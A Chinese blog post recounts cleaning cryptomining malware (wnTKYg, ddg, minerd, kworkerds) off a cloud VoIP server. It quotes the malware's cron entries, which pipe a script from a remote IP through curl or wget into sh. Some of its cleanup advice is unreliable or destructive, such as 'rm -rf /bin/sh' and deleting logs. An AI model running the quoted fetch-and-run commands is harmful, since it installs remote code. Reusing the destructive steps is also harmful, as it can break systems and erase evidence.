1. 程式人生 > >記一次伺服器被挖礦程式佔用的解決過程

記一次伺服器被挖礦程式佔用的解決過程

公司有臺做voip的伺服器最近CPU總是跑滿,這機器自從交給廠家搭好環境後基本就沒怎麼管它,於是進去檢視程序,top了下(見下圖)
記一次伺服器被挖礦程式***的解決過程
這個叫wnTKYg的程序很詭異,已經把CPU吃光了,上網一查,原來是中了挖礦的馬。(啊,我的天。這只是一個單核1G記憶體的阿里雲主機)既然被***了,那就得幹掉它,下面是解決過程:

1:第一步要先找到這個wnTKYg檔案實體,對了還有一個叫ddg.2020的程序。

[[email protected] ~]$ find / -name wnTKYg
/tmp/wnTKYg
[[email protected] ~]$ find / -name ddg*
/tmp/ddg.2020

2:接著把這兩個檔案的可執行許可權拿掉。

[[email protected] ~]$ cd /tmp
[[email protected] /tmp]$ chmod -x ddg.2020 wnTKYg

3:殺掉這該死的程序。

[[email protected] /tmp]$ ps -ef | grep -v grep | egrep 'wnTKYg|ddg' | awk '{print $2}' | xargs kill -9

4:清除無用的定時任務。

[[email protected] /tmp]$ crontab -l
*/5 * * * * curl -fsSL http://218.248.40.228:8443/i.sh | sh
*/5 * * * * wget -q -O- http://218.248.40.228:8443/i.sh | sh

這是挖礦程式生成的定時任務,不清除掉待會程序又起來了。

[[email protected] /tmp]$ echo > /var/spool/cron/root

因為這臺機器上沒有做定時任務,所以就直接清除掉了,如果有其他在用的定時任務,不要這樣哦。

5:刪除挖礦程式。

[[email protected] /tmp]$ rm -f ddg.2020 wnTKYg

6:清除.ssh/下的公鑰檔案。

[[email protected] ~/.ssh]$ cat authorized_keys 
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDUGqxNBCvqd+VNZTcSjyV3bs67sqwXSV+XztaY9QN/DDfeXEfWztdaXPbJvmLE34G
.........
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDfxLBb/eKbi0TVVULI8ILVtbv2iaGM+eZbZoCWcD3v/eF1B/VkHAC1YwIhfqkUYudwhxV
.................

這臺機器並沒有上傳過公鑰檔案,所以這就是***者留下的咯,刪掉刪掉。

[[email protected] ~/.ssh]$ rm -f authorized_keys

至此,***就已經清理完畢了。

小結:

在網上查了一下,發現大部分挖礦***都發生在redis上,而我這臺伺服器並沒有部署redis,而是當時廠家給裝的一套voip環境,因此我懷疑是voip軟體的漏洞導致了此次事件,之後再聯絡廠家看看。通過這次伺服器被***的案例,再一次印證了安全的重要性,安全無小事,繼續努力吧。

繼上面的挖礦木馬解決後,很有自豪感,但是在今天2018-09-09收到阿里雲的態勢感知的通知又有挖礦病毒了,於是解決。。。

2018-09-09週五 阿里雲態勢感知通知 檢測到伺服器有異常檔案下載,當時沒太注意,執行下面操作解決問題(簡單針對於minerd處理)

1、執行 top -i命令檢視cpu 使用總過高,使用top -l 檢視到是minerd作祟,

2、果斷ps -ef | grep ‘minerd’ 檢視pid,

3、使用kill -9  程式的pid 殺死掉,

4、到 cd  /tmp/下檢視是否存有臨時檔案,如果有rm -rf 刪除,沒有就算了

5、crontab -l 檢視是否有定時,有的話到cd /etc/crontab  檢視是否有陌生的定時任務,如果有也是直接刪除,

6、然後top 再檢視,成功了,然後查閱了資料,說redis 漏洞,果斷修改了ssh密碼,修改redis的埠,修改了登入資料庫密碼,一切看起來就是這麼簡單

xx.xx.xxx.xx(ixxxxx...)出現了可疑安全事件:Linux異常檔案下載 ,建議您立即登入雲盾-態勢感知控制檯檢視詳情和處理。

於是登入伺服器檢視。我嘞靠,輸入一條命令ls 反應比烏龜還慢,然後每條命令反應都在3秒才能出結果,靠,3秒男人,我可受不了,於是從花了一天時間才解決掉,廢話夠多了,看下面,

1、命令 top 檢視,我去,滿滿的cpu,但是怎麼看不到那個程序佔用了CPU呢

2、於是又 使用crontab -l 檢視,赤裸裸定時任務,這又是什麼鬼,礦機不是解決了嗎?這那來的任務,

  

清除無用的定時任務。

這是挖礦程式生成的定時任務,不清除掉待會程序又起來了。

[[email protected] /tmp]$ echo > /var/spool/cron/root
[[email protected] /tmp]$ echo > /var/spool/cron/crontabs/root
[[email protected] /tmp]$ echo > /etc/cron.d/root

因為這臺機器上沒有做定時任務,所以就直接清除掉了,如果有其他在用的定時任務,不要這樣哦。

4、cd /tmp/ 下,三個莫名其妙出現的檔案,果斷 rm -rf 檔名刪除

注意:在/tmp/下有一個檔名字是 Aegis-<Guid(5A2C30A2-A87D-490A-9281-6765EDAD7CBA)> 

刪除這個檔案的時候報錯:-bash: syntax error near unexpected token `('

百度之後要這樣刪除  rm -rf Aegis-\<Guid\(5A2C30A2-A87D-490A-9281-6765EDAD7CBA\)\> 

在每個括號前面加上\,因為在linux5.0之後,是不能帶有括號的,這個時候就需要轉譯了

 5、ls -al 看下,果然還有隱藏檔案,通通刪除

6、去cd /etc/crontab ,刪除定時任務,然後top -i,得到如下,cup依然張立在哪裡,懵逼

 

7、top -b 多了一個python,幹啥的不知道,檢視刪除程序python

8、最後去檢視日誌,如下順著這個日誌一步一步走下去,

9、cd  /etc,下rm -rf ld.so.preload

10、cd /usr/local/lib下 rm -rf libjdk.so

11、再去cd /etc/crontab ,檢視有沒有定時任務,有刪除,

12、去cd /tmp下,有也統統刪除,

13、top -b 居然有3個資源kworkerrds佔據cpu 33%,終於找到你,尼瑪,還好沒放棄,由於當時找到目標,太過激動沒截圖,因為已經下午5點了,花了大量時間找原因,看日誌,查資料,

14、於是果斷ps -ef | grep kworkerds,赤裸裸就是你

15、kill -9 pid ,history -c清除記錄(下面解釋)

16,top ,終於下來了,心累呀

17、之前花了大量時間檢視原因,原來是黑客通過在我日誌裡面留下了程式,我之前清除了minerd,然後又通過日誌裡面的程式進行了一個指令碼任務,通過這個指令碼獲取操作記錄,(為什麼history -c清除記錄),然後再次侵入我的伺服器,現在是21:00,心累,

18、對了,還有如下操作,這才完美收官。cd /var/log

19、可疑的日誌通通刪除,

20、記得修改所有密碼,記得history -c

上面的方法如果沒有效果可以結合下面的方法一起使用

A:先把定時任務刪除掉

rm -rf /etc/cron.d/root

rm -rf /var/spool/cron/crontabs

rm -rf /bin/sh /var/spool/cron/root

B:刪掉重啟系統後執行指令碼

rm -rf /bin/httpdns

C:刪掉挖礦執行指令碼

 rm -rf /tmp/kworkerds

D: 刪除修top顯示命令的指令碼 (導致top查詢不處理此挖礦程序)

rm -rf /usr/local/lib/libntp.so

E:刪除python執行檔案

rm -rf /tmp/.tmpa

F: 再用Top命令,就可以找出此耗cpu程序

7:kill 掉此程序

9:修改redis 密碼,最好修改bind 為127.0.0.1

相關推薦

伺服器程式佔用解決過程

公司有臺做voip的伺服器最近CPU總是跑滿,這機器自從交給廠家搭好環境後基本就沒怎麼管它,於是進去檢視程序,top了下(見下圖) 這個叫wnTKYg的程序很詭異,已經把CPU吃光了,上網一查,原來是中了挖礦的馬。(啊,我的天。這只是一個單核1G記憶體的阿里雲主機)既然被**

服務器的處理解決過程

amp 命令 刪除 root密碼 pos 服務器 exc 感染 oot 內網一臺服務器cpu爆滿,第6感猜測中了挖礦病毒,以下為cpu爆滿監控圖表趕緊ssh進系統,top了下,一個./x3e536747 進程占用了大量的cpu,cpu load average超過了cpu內

伺服器爆破 防護歷程

在騰訊雲搞了一個雲主機, 安裝了寶塔的服務, 第三天登陸 後臺發現有兩個ip在爆破root 密碼, 雖然對自己的密碼強度比較自信, 但是被人惦記也是很難受。決定做點什麼 。。。。 直接進入正題: 1. 最基本的建議就是:平時登陸和工作的時候都使用普通使用者進行操作 直接禁用root

Linux伺服器程式sustse和kworkerds感染後續處理

在上一篇博文Linux系統發現佔用CPU達100%的程序並處理 裡面以為已經把挖礦程式sustse處理乾淨了,可是沒過兩天又收到阿里雲簡訊提醒,說伺服器有問題,難道還有後門嗎?也多虧阿里雲給出提示“出現了可疑安全事件:Linux共享庫檔案預載入配置檔案可疑篡改”。網上查了查相關內容,原來這個

伺服器黑經歷

從接手公司伺服器兩個半星期經常性的無法正常ssh登陸,十次裡面有九次半都是顯示 ssh_exchange_identification:read:connection reset by peer 也谷歌很多種原因和解決方案,無非是分兩種:一是執行緒滿了,需要更改

伺服器攻擊經歷

    從接手公司伺服器兩個半星期經常性的無法正常ssh登陸,十次裡面有九次半都是顯示 ssh_exchange_identification:read:connection reset by peer     也谷歌很多種原因和解決方案,無非是分兩種:一是執行緒滿了,需要更

阿里雲伺服器程式minerd入侵的終極解決辦法

歡迎掃碼加入Java高知群交流       突然發現阿里雲伺服器CPU很高,幾乎達到100%,執行 top c 一看,嚇一跳,結果如下: 3798 root 20 0 386m 7852 1272 S 300.0 0.1 4355:11 /tm

手工清除病毒WannaMine V4.0的經歷

[作者:byeyear    郵箱:[email protected]    轉載請註明] 前兩天公司資訊保安處通知我的計算機存在永恆之藍漏洞並已被病毒感染,使用多方殺軟及專殺工具均無法有效清除,遂設法進行手工清除。 在被感染計算機上進行分析,對比被感染計算機和

伺服器掛掉,cpu佔用過大的問題

凌晨一點電話:咚咚咚 喂:伺服器掛掉了,你查檢視問題,然後處理下。 我:好的。 從日誌看幾乎所有的logic日誌全都掛掉,不再列印日誌,然後logic程序僵死,佔用cpu百分90多,有些可怕。 第一反應是邏輯迴圈問題。 因為是公司自己的框架採用lua編寫。

訪問Web服務偶爾不通問題解決過程

現象:我們部署的一個WEB服務,公司使用者在訪問過程中,時不時的遇到訪問超時,訪問失敗等問題 定位:通過抓包工具分析,發現client在傳送TCP SYN包後,Server沒有回覆SYN+ACK報文 問題原因:公司使用者通過無線網路或者有線網路,均是NAT網路。開啟tcp_tw_recy

服務器經歷與解決辦法

alt boot 告警 port 下載 被黑 rep $2 nano 記一次服務器被挖礦經歷與解決辦法 在最近的某一天裏面,中午的一個小息過後,突然手機的郵件和公眾號監控zabbix的告警多了起來。我拿起手機一看原來是某臺服務器上的CPU跑滿了,就開始登上去看一下是哪

病毒zz.sh——linux(centos)成為機後的排查與修復過程

我們工作組的主機叢集某天被發現cpu利用率600%多,顯然被種了後門來挖礦。寫一下這篇文章來記錄排查過程中遇到的問題。 1.怎麼發現變礦機? 1)top 發現cpu炸了。這個也是常見的檢視方法 2) netstat -natp 發現有幾個異常的tcp連線,一查ip,

站點掛馬問題排查

源碼 yahoo 首頁 阿裏 zhang 並且 加密 體積 ref 起因,在下班準備回家之際,收到幾條朋友發來的信息,說他的網站在百度搜索做信息流廣告推廣,但是從百度搜索點擊打開就會跳轉的×××,讓我幫忙排查下問題,是不是被掛馬了,於是乎就開始了後面的故事 為了保護網站

伺服器Tomcat優化經歷

公司需要一臺測試伺服器來做測試用,所以花了點時間把服務全部部署好,在部署好war包之後,發現Tomcat訪問超級慢。 1、進入Tomcat的bin目錄下,執行 ./catalina.sh run命令,在前臺列印執行資訊,首先看其有沒有報錯。好,沒有報錯,進行下一步。 1)修改你的jdk目錄下/

伺服器入侵,程序 command為ld-linux-x86-64佔用cpu很高

測試伺服器看到 ld-linux-x86-64的程序佔用cpu極高,user 是 mysql 的。 測試環境不會有這麼高的mysql負載,並且記憶體佔用基本為0。區塊鏈技術盛行,讓人不得不懷疑被抓去做礦機了。 初步排查 [[email protected]

伺服器inodes數報警的事件

1 # df -i 執行以上命令,發現/上的 inodes 佔用率為81%,於是開始處理。 首先找出哪個目錄底下檔案數最多: 1 # cd / 2 # for i in $(ls);do echo ${i} && find ${i} | wc -l;done

伺服器擴盤

問題:測試伺服器突然zk掛了,重新啟動後根本起不了,發現報錯: 查詢後發現根分割槽爆滿: 解決問題: 一、在虛擬機器上增加新盤 1、增加盤後將盤分割槽 [[email protected] ~]# fdisk /dev/sda Welcome to fdis

第一伺服器

在網路世界裡沒有僥倖,一切可能發生的事情終將發生......   網路安全所涉及的每一個環節都對最終的結果有直接的影響,任何一個環節的疏漏終將造成整個安全鏈條的崩潰。   在某個時間段內公司不允許訪問國外的 IP 地址,自己搭建的 VPN 是無法使用的。所以我就想使用國內的 VPS

伺服器解決辦法

公司用的阿里雲的機器,有一天要下班了,公司的雲監控報警說伺服器100%,我就top了一下,發現/tmp/ddgs.3013和/tmp/qW3xT.2兩個檔案把CPU跑滿了,接著百度了一下,發現是挖礦病毒。然後我就kill掉有刪除一下檔案,發現就又出現了,這時心裡有點慌慌不知,

解決阿里雲伺服器提示程式風險

      今天大早上收到阿里雲郵件通知,提示有挖礦程式。一個激靈爬起來,折騰了一早上,終於解決問題了。   其實前兩天就一直收到阿里雲的通知,檢測到對外攻擊,阻斷了對其他伺服器6379、 6380和22埠的訪問,當時沒怎麼當一回兒事,反正是我用來自己學習用的,就放著不管了,結果今天事態就大了。